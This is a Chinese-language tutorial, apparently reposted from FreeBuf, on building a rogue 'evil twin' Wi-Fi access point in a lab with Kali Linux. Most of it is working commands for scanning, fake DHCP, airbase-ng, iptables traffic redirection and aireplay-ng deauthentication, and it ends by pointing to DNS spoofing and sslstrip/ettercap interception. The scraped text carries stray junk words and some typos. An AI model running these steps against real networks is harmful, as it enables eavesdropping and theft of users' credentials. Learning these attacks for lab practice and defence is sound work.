技術分享:WIFI釣魚的入門姿式

簡介

該實驗先是搭建一個測試環境,而後建立一個假的無線接入點,把網絡鏈接鏈接到假的接入點而且強迫用戶鏈接假的無線點。css

事先準備

1.無線網卡:無線網卡用於數據包的嗅探和注入。linux

2. Backtrack或者Kali Linux: 攻擊平臺sql

3.無線網絡:確保該無線由用戶使用,而且能控制這個無線接入點。服務器

4.一個目標機器:這個機器能夠是你的物理機或者虛擬機。本次實驗中用到的是Windows 7 虛擬機網絡

開始實驗:建立一個流氓接入點

第一步:

啓動虛擬機,選擇kali linux 。點擊」編輯虛擬機設置(Edit virtual machine settings)」,進入到「網絡適配器(Network Adapter)」選項,在網絡鏈接中選擇「橋接(Bridged)」:app

圖片1.png

第二步:

開啓kali 用root帳戶登陸。dom

第三步:

鏈接筆記本的無線網卡。確保在Removable Devices選項下的無線網卡選項前面有一個藍色的對鉤。若是沒有,須要選擇無線網卡來讓無線網卡從Windows系統中斷開,鏈接到kali linux虛擬機,以下圖所示:tcp

 

圖片2.png

第四步:

打開終端,輸入以下命令檢查IP地址和網關。ide

圖片3.png

在本例中,網關是192.168.0.1測試

第五步:

先是用如下命令列出全部網卡列表,以下圖:

能夠看到一個名字是wlan5的網卡,就是這個了。

 圖片4.png

第六步:

檢查下用戶附近的無線AP是否均可用,用以下命令,截圖以下:

airodump-ng wlan5

這個命令後將會開始捕捉數據包,而且把用戶附近的訪問點列出來,其中BSSID是無線AP的MAC地址,Channel表明頻率。注意PWR列的值,越靠近的路由器這個值越小。

 

 

圖片5.png圖片6.png

第七步:

記下AP點的BSSID 和Channel的值。此外,還要記下目標設備的MAC地址。

在這個例子中,BISSID值是5E:F9:6A:29:28:18,Channel的值是2。目標機器的MAC地址是68:5D:43:7D:F7:E9

第八步:

咱們必須創建一個假的DHCP服務器來提供一個假的AP接入點。在kali中執行如下命令就能夠建立一個DHCP:

apt-get install isc-dhcp-server

創建好後,修改DHCP配置文件,以下:

leafpad /etc/dhcpd.conf
authoraitative;

default-lease-time 600; max-lease-time 7200; subnet 192.168.1.0 netmask 255.255.255.0 { option routers 192.168.1.1; option subnet-mask 255.255.255.0; option domain-name 「Epson_Printer」; option domain-name-servers 192.168.1.1; range 192.168.1.2 192.168.1.40; }

保存並關閉配置文件。

對/etc/dhcpd/dhcpd.conf文件重複上述操做。

第九步:

打開終端,執行如下命令,建立一個ESSID名和受害者訪問AP類似的AP接入點,例子中咱們用「Epson_Printer」。

airbase-ng –e Epson_Printer -c 2 wlan5

l e 是AP接入點的ESSID(MAC地址)

l c是無線網絡的頻率

l Wlan5是網卡名

如今,名叫「Epson_Printer」的新的AP接入點建立完成。

圖片7.png圖片8.png

第十步:

如今,咱們打開一個新的終端,開始監控這個釣魚AP,執行以下命令:

airodump-ng –bssid 00:C0:CA:70:8F:25 -C 2 wlan 5 

圖片9.png圖片10.png

第十一步:

檢查第五步的產生的窗口,新建的AP接入點應該是能夠看見的:

圖片11.png

第十二步:

如今,咱們必須向網絡提供這個假的無線AP。打開終端,依次輸入以下命令:

·  ifconfig at0 192.168.1.1 netmask 255.255.255.0

·  ifconfig at0 mtu 1400

·  route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

·  iptables –flush ·  iptables –table nat –flush ·  iptables –delete-chain ·  iptables –table nat –delete-chain ·  echo 1 > /proc/sys/net/ipv4/ip_forward ·  iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.0.1(gateway) ·  iptables -P FORWARD ACCEPT ·  iptables –append FORWARD –in-interface at0 -j ACCEPT ·  iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE ·  iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000 ·  dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 ·  /etc/init.d/isc-dhcp-server start

 圖片12.png

 

第十三步:

咱們能夠等待別人鏈接這個假的無線AP,也能夠用de-authenticate攻擊強行迫使咱們的目標從新鏈接AP,這樣咱們就能伺機抓包。

咱們能夠用如下命令來執行:

aireplay-ng –deauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5

  5E:F9:6A:29:28:18 是無線AP的MAC地址

 0 表明進行de-authentication.

 -c 是目標機器的MAC地址

 wlan5 是網卡

如下截圖中能夠看到,無線網卡正在發送de-authentication數據包給目標無線AP。目標機器就和「Epson_Printer」 鏈接點斷開了,而且開始嘗試從新鏈接,以下圖:

圖片13.png圖片14.png 

 第十四步:

因爲連續發送deauth包,客戶端一直沒法鏈接到原來的無線AP,因而就開始嘗試鏈接其餘最強的無線AP,咱們的假AP信號很強,因而就開始連了。以下圖:

 

圖片15.png圖片16.png

第十五步:

查看airodump-ng命令窗口。能夠在終端中查看到鏈接的設備:

圖片17.png

如今,受害者的設備已經鏈接到咱們的假的無線AP中了。從這裏開始,攻擊者能夠施行各類手段,好比說DNS欺騙用戶鏈接一個假的網站,獲取到用戶認證信息,或者用 sslstrip 和ettercap 進行中間人攻擊。

最後:這篇有點基礎,你們湊合看吧。輕噴(づ ̄3 ̄)づ╭❤~

 *參考來源:resources.infosecinstitute,FB小編東二門陳冠希編譯,轉載請註明來自FreeBuf黑客與極客(FreeBuf.COM)

相關文章
相關標籤/搜索